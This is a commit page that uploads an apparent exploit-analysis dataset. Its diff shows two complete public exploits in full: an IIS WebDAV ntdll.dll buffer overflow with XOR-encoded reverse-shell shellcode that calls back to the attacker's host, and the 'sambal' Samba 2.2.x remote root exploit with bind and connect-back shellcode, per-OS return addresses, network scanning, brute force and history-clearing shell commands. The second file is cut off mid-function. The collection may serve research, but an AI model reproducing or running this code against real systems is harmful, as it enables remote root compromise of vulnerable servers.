lilbool commited on Nov 19, 2024

Commit

497f2f3

verified ·

1 Parent(s): f2eecd0

Upload 212 files

Browse files

This view is limited to 50 files because it contains too many changes. See raw diff

Files changed (50) hide show

.gitattributes +1 -0
code_analysis_dataset.csv +3 -0
exploit-analyzer/compiled_exploits.json +0 -0
exploit-analyzer/exploits/exploit_1.txt +233 -0
exploit-analyzer/exploits/exploit_10.txt +1176 -0
exploit-analyzer/exploits/exploit_100.txt +291 -0
exploit-analyzer/exploits/exploit_1000.txt +243 -0
exploit-analyzer/exploits/exploit_1001.txt +289 -0
exploit-analyzer/exploits/exploit_1003.txt +195 -0
exploit-analyzer/exploits/exploit_1004.txt +100 -0
exploit-analyzer/exploits/exploit_1005.txt +69 -0
exploit-analyzer/exploits/exploit_1006.txt +100 -0
exploit-analyzer/exploits/exploit_1007.txt +82 -0
exploit-analyzer/exploits/exploit_1008.txt +255 -0
exploit-analyzer/exploits/exploit_1009.txt +70 -0
exploit-analyzer/exploits/exploit_101.txt +429 -0
exploit-analyzer/exploits/exploit_1010.txt +76 -0
exploit-analyzer/exploits/exploit_1011.txt +35 -0
exploit-analyzer/exploits/exploit_1012.txt +38 -0
exploit-analyzer/exploits/exploit_1013.txt +67 -0
exploit-analyzer/exploits/exploit_1014.txt +32 -0
exploit-analyzer/exploits/exploit_1015.txt +37 -0
exploit-analyzer/exploits/exploit_1016.txt +62 -0
exploit-analyzer/exploits/exploit_1017.txt +32 -0
exploit-analyzer/exploits/exploit_1018.txt +112 -0
exploit-analyzer/exploits/exploit_1019.txt +289 -0
exploit-analyzer/exploits/exploit_102.txt +234 -0
exploit-analyzer/exploits/exploit_1020.txt +667 -0
exploit-analyzer/exploits/exploit_1021.txt +200 -0
exploit-analyzer/exploits/exploit_1022.txt +31 -0
exploit-analyzer/exploits/exploit_1023.txt +37 -0
exploit-analyzer/exploits/exploit_1024.txt +7 -0
exploit-analyzer/exploits/exploit_1025.txt +3 -0
exploit-analyzer/exploits/exploit_1026.txt +273 -0
exploit-analyzer/exploits/exploit_1027.txt +115 -0
exploit-analyzer/exploits/exploit_1028.txt +157 -0
exploit-analyzer/exploits/exploit_1029.txt +87 -0
exploit-analyzer/exploits/exploit_103.txt +264 -0
exploit-analyzer/exploits/exploit_1030.txt +62 -0
exploit-analyzer/exploits/exploit_1031.txt +29 -0
exploit-analyzer/exploits/exploit_1032.txt +153 -0
exploit-analyzer/exploits/exploit_1033.txt +32 -0
exploit-analyzer/exploits/exploit_1034.txt +82 -0
exploit-analyzer/exploits/exploit_1035.txt +290 -0
exploit-analyzer/exploits/exploit_1036.txt +79 -0
exploit-analyzer/exploits/exploit_1037.txt +360 -0
exploit-analyzer/exploits/exploit_1038.txt +297 -0
exploit-analyzer/exploits/exploit_1039.txt +72 -0
exploit-analyzer/exploits/exploit_104.txt +60 -0
exploit-analyzer/exploits/exploit_1040.txt +91 -0

.gitattributes CHANGED Viewed

@@ -33,3 +33,4 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
 *.zip filter=lfs diff=lfs merge=lfs -text
 *.zst filter=lfs diff=lfs merge=lfs -text
 *tfevents* filter=lfs diff=lfs merge=lfs -text

 *.zip filter=lfs diff=lfs merge=lfs -text
 *.zst filter=lfs diff=lfs merge=lfs -text
 *tfevents* filter=lfs diff=lfs merge=lfs -text
+code_analysis_dataset.csv filter=lfs diff=lfs merge=lfs -text

code_analysis_dataset.csv ADDED Viewed

	@@ -0,0 +1,3 @@

+version https://git-lfs.github.com/spec/v1
+oid sha256:f9fb83acd5511b7c7d8d9788388c55f2379da13e0921796787695922f2ef4f6d
+size 11946655

exploit-analyzer/compiled_exploits.json ADDED Viewed

The diff for this file is too large to render. See raw diff

exploit-analyzer/exploits/exploit_1.txt ADDED Viewed

	@@ -0,0 +1,233 @@

+/*******************************************************************/
+/* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */
+/* --------------------------------------------------------------- */
+/* this is the exploit for ntdll.dll through WebDAV. */
+/* run a netcat ex: nc -L -vv -p 666 */
+/* wb server.com your_ip 666 0 */
+/* the shellcode is a reverse remote shell */
+/* you need to pad a bit.. the best way I think is launching */
+/* the exploit with pad = 0 and after that, the server will be */
+/* down for a couple of seconds, now retry with pad at 1 */
+/* and so on..pad 2.. pad 3.. if you haven't the shell after */
+/* something like pad at 10 I think you better to restart from */
+/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */
+/* on all the others servers it was at 2,3,4, etc..sometimes */
+/* you can have the force with you, and get the shell in 1 try */
+/* sometimes you need to pad more than 10 times ;) */
+/* the shellcode was coded by myself, it is SEH + ScanMem to */
+/* find the famous offsets (GetProcAddress).. */
+/* */
+/*******************************************************************/
+#include <winsock.h>
+#include <windows.h>
+#include <stdio.h>
+#pragma comment (lib,"ws2_32")
+char shellc0de[] =
+"\x55\x8b\xec\x33\xc9\x53\x56\x57\x8d\x7d\xa2\xb1\x25\xb8\xcc\xcc"
+"\xcc\xcc\xf3\xab\xeb\x09\xeb\x0c\x58\x5b\x59\x5a\x5c\x5d\xc3\xe8"
+"\xf2\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xb5\x01\x80\x33"
+"\x95\x43\xe2\xfa\x66\x83\xeb\x67\xfc\x8b\xcb\x8b\xf3\x66\x83\xc6"
+"\x46\xad\x56\x40\x74\x16\x55\xe8\x13\x00\x00\x00\x8b\x64\x24\x08"
+"\x64\x8f\x05\x00\x00\x00\x00\x58\x5d\x5e\xeb\xe5\x58\xeb\xb9\x64"
+"\xff\x35\x00\x00\x00\x00\x64\x89\x25\x00\x00\x00\x00\x48\x66\x81"
+"\x38\x4d\x5a\x75\xdb\x64\x8f\x05\x00\x00\x00\x00\x5d\x5e\x8b\xe8"
+"\x03\x40\x3c\x8b\x78\x78\x03\xfd\x8b\x77\x20\x03\xf5\x33\xd2\x8b"
+"\x06\x03\xc5\x81\x38\x47\x65\x74\x50\x75\x25\x81\x78\x04\x72\x6f"
+"\x63\x41\x75\x1c\x81\x78\x08\x64\x64\x72\x65\x75\x13\x8b\x47\x24"
+"\x03\xc5\x0f\xb7\x1c\x50\x8b\x47\x1c\x03\xc5\x8b\x1c\x98\x03\xdd"
+"\x83\xc6\x04\x42\x3b\x57\x18\x75\xc6\x8b\xf1\x56\x55\xff\xd3\x83"
+"\xc6\x0f\x89\x44\x24\x20\x56\x55\xff\xd3\x8b\xec\x81\xec\x94\x00"
+"\x00\x00\x83\xc6\x0d\x56\xff\xd0\x89\x85\x7c\xff\xff\xff\x89\x9d"
+"\x78\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x33\xc9\x51\x51\x51"
+"\x51\x41\x51\x41\x51\xff\xd0\x89\x85\x94\x00\x00\x00\x8b\x85\x7c"
+"\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x83\xc6\x08\x6a\x10\x56"
+"\x8b\x8d\x94\x00\x00\x00\x51\xff\xd0\x33\xdb\xc7\x45\x8c\x44\x00"
+"\x00\x00\x89\x5d\x90\x89\x5d\x94\x89\x5d\x98\x89\x5d\x9c\x89\x5d"
+"\xa0\x89\x5d\xa4\x89\x5d\xa8\xc7\x45\xb8\x01\x01\x00\x00\x89\x5d"
+"\xbc\x89\x5d\xc0\x8b\x9d\x94\x00\x00\x00\x89\x5d\xc4\x89\x5d\xc8"
+"\x89\x5d\xcc\x8d\x45\xd0\x50\x8d\x4d\x8c\x51\x6a\x00\x6a\x00\x6a"
+"\x00\x6a\x01\x6a\x00\x6a\x00\x83\xc6\x09\x56\x6a\x00\x8b\x45\x20"
+"\xff\xd0"
+"CreateProcessA\x00LoadLibraryA\x00ws2_32.dll\x00WSASocketA\x00"
+"connect\x00\x02\x00\x02\x9A\xC0\xA8\x01\x01\x00"
+"cmd" // don't change anything..
+"\x00\x00\xe7\x77" // offsets of kernel32.dll for some win ver..
+"\x00\x00\xe8\x77"
+"\x00\x00\xf0\x77"
+"\x00\x00\xe4\x77"
+"\x00\x88\x3e\x04" // win2k3
+"\x00\x00\xf7\xbf" // win9x =P
+"\xff\xff\xff\xff";
+int test_host(char *host)
+{
+char search[100]="";
+int sock;
+struct hostent *heh;
+struct sockaddr_in hmm;
+char buf[100] ="";
+if(strlen(host)>60) {
+printf("error: victim host too long.\r\n");
+return 1;
+}
+if ((heh = gethostbyname(host))==0){
+printf("error: can't resolve '%s'",host);
+return 1;
+}
+sprintf(search,"SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n",host);
+hmm.sin_port = htons(80);
+hmm.sin_family = AF_INET;
+hmm.sin_addr = *((struct in_addr *)heh->h_addr);
+if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){
+printf("error: can't create socket");
+return 1;
+}
+printf("Checking WebDav on '%s' ... ",host);
+if ((connect(sock, (struct sockaddr *) &hmm, sizeof(hmm))) == -1){
+printf("CONNECTING_ERROR\r\n");
+return 1;
+}
+send(sock,search,strlen(search),0);
+recv(sock,buf,sizeof(buf),0);
+if(buf[9]=='4'&&buf[10]=='1'&&buf[11]=='1')
+return 0;
+printf("NOT FOUND\r\n");
+return 1;
+}
+void help(char *program)
+{
+printf("syntax: %s <victim_host> <your_host> <your_port> [padding]\r\n",program);
+return;
+}
+void banner(void)
+{
+printf("\r\n\t [Crpt] ntdll.dll exploit trough WebDAV by kralor
+[Crpt]\r\n");
+printf("\t\twww.coromputer.net && undernet #coromputer\r\n\r\n");
+return;
+}
+void main(int argc, char *argv[])
+{
+WSADATA wsaData;
+unsigned short port=0;
+char *port_to_shell="", *ip1="", data[50]="";
+unsigned int i,j;
+unsigned int ip = 0 ;
+int s, PAD=0x10;
+struct hostent *he;
+struct sockaddr_in crpt;
+char buffer[65536] ="";
+char request[80000]; // huuuh, what a mess! :)
+char content[] =
+"<?xml version=\"1.0\"?>\r\n"
+"<g:searchrequest xmlns:g=\"DAV:\">\r\n"
+"<g:sql>\r\n"
+"Select \"DAV:displayname\" from scope()\r\n"
+"</g:sql>\r\n"
+"</g:searchrequest>\r\n";
+banner();
+if((argc<4)||(argc>5)) {
+help(argv[0]);
+return;
+}
+if(WSAStartup(0x0101,&wsaData)!=0) {
+printf("error starting winsock..");
+return;
+}
+if(test_host(argv[1]))
+return;
+if(argc==5)
+PAD+=atoi(argv[4]);
+printf("FOUND\r\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\r\n",PAD,PAD);
+ip = inet_addr(argv[2]); ip1 = (char*)&ip;
+shellc0de[448]=ip1[0]; shellc0de[449]=ip1[1]; shellc0de[450]=ip1[2];
+shellc0de[451]=ip1[3];
+port = htons(atoi(argv[3]));
+port_to_shell = (char *) &port;
+shellc0de[446]=port_to_shell[0];
+shellc0de[447]=port_to_shell[1];
+// we xor the shellcode [xored by 0x95 to avoid bad chars]
+__asm {
+lea eax, shellc0de
+add eax, 0x34
+xor ecx, ecx
+mov cx, 0x1b0
+wah:
+xor byte ptr[eax], 0x95
+inc eax
+loop wah
+}
+if ((he = gethostbyname(argv[1]))==0){
+printf("error: can't resolve '%s'",argv[1]);
+return;
+}
+crpt.sin_port = htons(80);
+crpt.sin_family = AF_INET;
+crpt.sin_addr = *((struct in_addr *)he->h_addr);
+if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
+printf("error: can't create socket");
+return;
+}
+printf("Connecting... ");
+if ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1){
+printf("ERROR\r\n");
+return;
+}
+// No Operation.
+for(i=0;i<sizeof(buffer);buffer[i]=(char)0x90,i++);
+// fill the buffer with the shellcode
+for(i=64000,j=0;i<sizeof(buffer)&&j<sizeof(shellc0de)-1;buffer[i]=shellc0de[j],i++,j++);
+// well..it is not necessary..
+for(i=0;i<2500;buffer[i]=PAD,i++);
+/* we can simply put our ret in this 2 offsets.. */
+//buffer[2086]=PAD;
+//buffer[2085]=PAD;
+buffer[sizeof(buffer)]=0x00;
+memset(request,0,sizeof(request));
+memset(data,0,sizeof(data));
+sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nContent-Length: ",buffer,argv[1]);
+sprintf(request,"%s%d\r\n\r\n",request,strlen(content));
+printf("CONNECTED\r\nSending evil request... ");
+send(s,request,strlen(request),0);
+send(s,content,strlen(content),0);
+printf("SENT\r\n");
+recv(s,data,sizeof(data),0);
+if(data[0]!=0x00) {
+printf("Server seems to be patched.\r\n");
+printf("data: %s\r\n",data);
+} else
+printf("Now if you are lucky you will get a shell.\r\n");
+closesocket(s);
+return;
+}
+// milw0rm.com [2003-03-23]

exploit-analyzer/exploits/exploit_10.txt ADDED Viewed

	@@ -0,0 +1,1176 @@

+/*
+    Remote root exploit for Samba 2.2.x and prior that works against
+    Linux (all distributions), FreeBSD (4.x, 5.x), NetBSD (1.x) and
+    OpenBSD (2.x, 3.x and 3.2 non-executable stack).
+    sambal.c is able to identify samba boxes. It will send a netbios
+    name packet to port 137. If the box responds with the mac address
+    00-00-00-00-00-00, it's probally running samba.
+    [esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0
+    samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
+    --------------------------------------------------------------
+    + Scan mode.
+    + [192.168.0.3] Samba
+    + [192.168.0.10] Windows
+    + [192.168.0.20] Windows
+    + [192.168.0.21] Samba
+    + [192.168.0.30] Windows
+    + [192.168.0.31] Samba
+    + [192.168.0.33] Windows
+    + [192.168.0.35] Windows
+    + [192.168.0.36] Windows
+    + [192.168.0.37] Windows
+    ...
+    + [192.168.0.133] Samba
+    Great!
+    You could now try a preset (-t0 for a list), but most of the
+    time bruteforce will do. The smbd spawns a new process on every
+    connect, so we can bruteforce the return address...
+    [esdee@embrace esdee]$ ./sambal -b 0 -v 192.168.0.133
+    samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
+    --------------------------------------------------------------
+    + Verbose mode.
+    + Bruteforce mode. (Linux)
+    + Using ret: [0xbffffed4]
+    + Using ret: [0xbffffda8]
+    + Using ret: [0xbffffc7c]
+    + Using ret: [0xbffffb50]
+    + Using ret: [0xbffffa24]
+    + Using ret: [0xbffff8f8]
+    + Using ret: [0xbffff7cc]
+    + Worked!
+    --------------------------------------------------------------
+  Linux LittleLinux.selwerd.lan 2.4.18-14 #1 Wed Sep 4 11:57:57 EDT 2002 i586
+ i586 i386 GNU/Linux
+    uid=0(root) gid=0(root) groups=99(nobody)
+sambal.c : samba-2.2.8 < remote root exploit by eSDee (www.netric.org|
+*/
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <netdb.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <signal.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/select.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/time.h>
+#include <sys/wait.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+typedef struct {
+        unsigned char type;
+        unsigned char flags;
+        unsigned short length;
+} NETBIOS_HEADER;
+typedef struct {
+        unsigned char protocol[4];
+        unsigned char command;
+        unsigned short status;
+        unsigned char reserved;
+        unsigned char  flags;
+        unsigned short flags2;
+        unsigned char  pad[12];
+        unsigned short tid;
+        unsigned short pid;
+        unsigned short uid;
+        unsigned short mid;
+} SMB_HEADER;
+int OWNED = 0;
+pid_t childs[100];
+struct sockaddr_in addr1;
+struct sockaddr_in addr2;
+char linux_bindcode[] =
+        "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
+        "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50"
+        "\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02"
+        "\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05"
+        "\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
+        "\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
+        "\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
+        "\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0"
+        "\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"
+        "\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
+        "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24"
+        "\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0"
+        "\x89\xf3\xb0\x06\xcd\x80\xeb\x99";
+char bsd_bindcode[] =
+        "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
+        "\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02"
+        "\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80"
+        "\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57"
+        "\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89"
+        "\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
+        "\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
+        "\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56"
+        "\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
+        "\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
+        "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b"
+        "\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80"
+        "\xeb\x9a";
+char linux_connect_back[] =
+        "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
+        "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"
+        "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"
+        "\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
+        "\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
+        "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
+        "\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f"
+        "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
+        "\x01\xcd\x80";
+char bsd_connect_back[] =
+        "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
+        "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"
+        "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"
+        "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80"
+        "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52"
+        "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31"
+        "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
+        "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
+struct {
+        char *type;
+        unsigned long ret;
+        char *shellcode;
+        int os_type;    /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec stack */
+} targets[] = {
+        { "samba-2.2.x - Debian 3.0           ", 0xbffffea2, linux_bindcode, 0 },
+        { "samba-2.2.x - Gentoo 1.4.x         ", 0xbfffe890, linux_bindcode, 0 },
+        { "samba-2.2.x - Mandrake 8.x         ", 0xbffff6a0, linux_bindcode, 0 },
+        { "samba-2.2.x - Mandrake 9.0         ", 0xbfffe638, linux_bindcode, 0 },
+        { "samba-2.2.x - Redhat 9.0           ", 0xbffff7cc, linux_bindcode, 0 },
+        { "samba-2.2.x - Redhat 8.0           ", 0xbffff2f0, linux_bindcode, 0 },
+        { "samba-2.2.x - Redhat 7.x           ", 0xbffff310, linux_bindcode, 0 },
+        { "samba-2.2.x - Redhat 6.x           ", 0xbffff2f0, linux_bindcode, 0 },
+        { "samba-2.2.x - Slackware 9.0        ", 0xbffff574, linux_bindcode, 0 },
+        { "samba-2.2.x - Slackware 8.x        ", 0xbffff574, linux_bindcode, 0 },
+        { "samba-2.2.x - SuSE 7.x             ", 0xbffffbe6, linux_bindcode, 0 },
+        { "samba-2.2.x - SuSE 8.x             ", 0xbffff8f8, linux_bindcode, 0 },
+        { "samba-2.2.x - FreeBSD 5.0          ", 0xbfbff374, bsd_bindcode, 1 },
+        { "samba-2.2.x - FreeBSD 4.x          ", 0xbfbff374, bsd_bindcode, 1 },
+        { "samba-2.2.x - NetBSD 1.6           ", 0xbfbfd5d0, bsd_bindcode, 1 },
+        { "samba-2.2.x - NetBSD 1.5           ", 0xbfbfd520, bsd_bindcode, 1 },
+        { "samba-2.2.x - OpenBSD 3.2          ", 0x00159198, bsd_bindcode, 2 },
+        { "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode, 2 },
+        { "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode, 2 },
+        { "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode, 2 },
+        { "Crash (All platforms)              ", 0xbade5dee, linux_bindcode, 0 },
+};
+void shell();
+void usage();
+void handler();
+int is_samba(char *ip, unsigned long time_out);
+int Connect(int fd, char *ip, unsigned int port, unsigned int time_out);
+int read_timer(int fd, unsigned int time_out);
+int write_timer(int fd, unsigned int time_out);
+int start_session(int sock);
+int exploit_normal(int sock, unsigned long ret, char *shellcode);
+int exploit_openbsd32(int sock, unsigned long ret, char *shellcode);
+void usage(char *prog)
+{
+        fprintf(stderr, "Usage: %s [-bBcCdfprsStv] [host]\n\n"
+                        "-b <platform>   bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n"
+                        "-B <step>       bruteforce steps (default = 300)\n"
+                        "-c <ip address> connectback ip address\n"
+                        "-C <max childs> max childs for scan/bruteforce mode (default = 40)\n"
+                        "-d <delay>      bruteforce/scanmode delay in micro seconds (default = 100000)\n"
+                        "-f              force\n"
+                        "-p <port>       port to attack (default = 139)\n"
+                        "-r <ret>        return address\n"
+                        "-s              scan mode (random)\n"
+                        "-S <network>    scan mode\n"
+                        "-t <type>       presets (0 for a list)\n"
+                        "-v              verbose mode\n\n", prog);
+        exit(1);
+}
+int is_samba(char *ip, unsigned long time_out)
+{
+        char
+        nbtname[]= /* netbios name packet */
+        {
+                0x80,0xf0,0x00,0x10,0x00,0x01,0x00,0x00,
+                0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,
+                0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
+                0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
+                0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
+                0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,
+                0x00,0x01
+        };
+        unsigned char recv_buf[1024];
+        unsigned char *ptr;
+        int i = 0;
+        int s = 0;
+        unsigned int total = 0;
+        if ((s = socket(PF_INET, SOCK_DGRAM, 17)) <= 0) return -1;
+        if(Connect(s, ip, 137, time_out) == -1) {
+                close(s);
+                return -1;
+        }
+        memset(recv_buf, 0x00, sizeof(recv_buf));
+        if(write_timer(s, time_out) == 1) {
+                if (write(s, nbtname, sizeof(nbtname)) <= 0) {
+                        close(s);
+                        return -1;
+                }
+        }
+        if (read_timer(s, time_out) == 1) {
+                if (read(s, recv_buf, sizeof(recv_buf)) <= 0) {
+                        close(s);
+                        return -1;
+                }
+                ptr = recv_buf + 57;
+                total = *(ptr - 1); /* max names */
+                while(ptr < recv_buf + sizeof(recv_buf)) {
+                        ptr += 18;
+                        if (i == total) {
+                                ptr -= 19;
+                                if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 && *(ptr + 3) == 0x00 &&
+                                     *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 && *(ptr + 6) == 0x00) {
+                                        close(s);
+                                        return 0;
+                                }
+                                close(s);
+                                return 1;
+                        }
+                        i++;
+                }
+        }
+        close(s);
+        return -1;
+}
+int Connect(int fd, char *ip, unsigned int port, unsigned int time_out)
+{
+        /* ripped from no1 */
+        int                      flags;
+        int                      select_status;
+        fd_set                   connect_read, connect_write;
+        struct timeval           timeout;
+        int                      getsockopt_length = 0;
+        int                      getsockopt_error = 0;
+        struct sockaddr_in       server;
+        bzero(&server, sizeof(server));
+        server.sin_family = AF_INET;
+        inet_pton(AF_INET, ip, &server.sin_addr);
+        server.sin_port = htons(port);
+        if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
+                close(fd);
+                return -1;
+        }
+        if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
+                close(fd);
+                return -1;
+        }
+        timeout.tv_sec = time_out;
+        timeout.tv_usec = 0;
+        FD_ZERO(&connect_read);
+        FD_ZERO(&connect_write);
+        FD_SET(fd, &connect_read);
+        FD_SET(fd, &connect_write);
+        if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) {
+                if(errno != EINPROGRESS) {
+                        close(fd);
+                        return -1;
+                }
+        }
+        else {
+                if(fcntl(fd, F_SETFL, flags) < 0) {
+                        close(fd);
+                        return -1;
+                }
+                return 1;
+        }
+        select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);
+        if(select_status == 0) {
+                close(fd);
+                return -1;
+        }
+        if(select_status == -1) {
+                close(fd);
+                return -1;
+        }
+        if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) {
+                if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write))
+ {
+                        getsockopt_length = sizeof(getsockopt_error);
+                        if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) {
+                                errno = ETIMEDOUT;
+                                close(fd);
+                                return -1;
+                        }
+                        if(getsockopt_error == 0) {
+                                if(fcntl(fd, F_SETFL, flags) < 0) {
+                                        close(fd);
+                                        return -1;
+                                }
+                                return 1;
+                        }
+                        else {
+                                errno = getsockopt_error;
+                                close(fd);
+                                return (-1);
+                                }
+                        }
+                }
+        else {
+                close(fd);
+                return 1;
+        }
+        if(fcntl(fd, F_SETFL, flags) < 0) {
+                close(fd);
+                return -1;
+        }
+        return 1;
+}
+int read_timer(int fd, unsigned int time_out)
+{
+        /* ripped from no1 */
+        int                      flags;
+        int                      select_status;
+        fd_set                   fdread;
+        struct timeval           timeout;
+        if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
+                close(fd);
+                return (-1);
+        }
+        if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
+                close(fd);
+                return (-1);
+        }
+        timeout.tv_sec = time_out;
+        timeout.tv_usec = 0;
+        FD_ZERO(&fdread);
+        FD_SET(fd, &fdread);
+        select_status = select(fd + 1, &fdread, NULL, NULL, &timeout);
+        if(select_status == 0) {
+                close(fd);
+                return (-1);
+        }
+        if(select_status == -1) {
+                close(fd);
+                return (-1);
+        }
+        if(FD_ISSET(fd, &fdread)) {
+                if(fcntl(fd, F_SETFL, flags) < 0) {
+                        close(fd);
+                        return -1;
+                }
+                return 1;
+        }
+        else {
+                close(fd);
+                return 1;
+        }
+}
+int write_timer(int fd, unsigned int time_out)
+{
+        /* ripped from no1 */
+        int                      flags;
+        int                      select_status;
+        fd_set                   fdwrite;
+        struct timeval           timeout;
+        if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
+                close(fd);
+                return (-1);
+        }
+        if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
+                close(fd);
+                return (-1);
+        }
+        timeout.tv_sec = time_out;
+        timeout.tv_usec = 0;
+        FD_ZERO(&fdwrite);
+        FD_SET(fd, &fdwrite);
+        select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout);
+        if(select_status == 0) {
+                close(fd);
+                return -1;
+        }
+        if(select_status == -1) {
+                close(fd);
+                return -1;
+        }
+        if(FD_ISSET(fd, &fdwrite)) {
+                if(fcntl(fd, F_SETFL, flags) < 0) {
+                        close(fd);
+                        return -1;
+                }
+                return 1;
+        }
+        else {
+                close(fd);
+                return -1;
+        }
+}
+void shell(int sock)
+{
+        fd_set  fd_read;
+        char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE\";uname -a;id;\n";
+        int n;
+        FD_ZERO(&fd_read);
+        FD_SET(sock, &fd_read);
+        FD_SET(0, &fd_read);
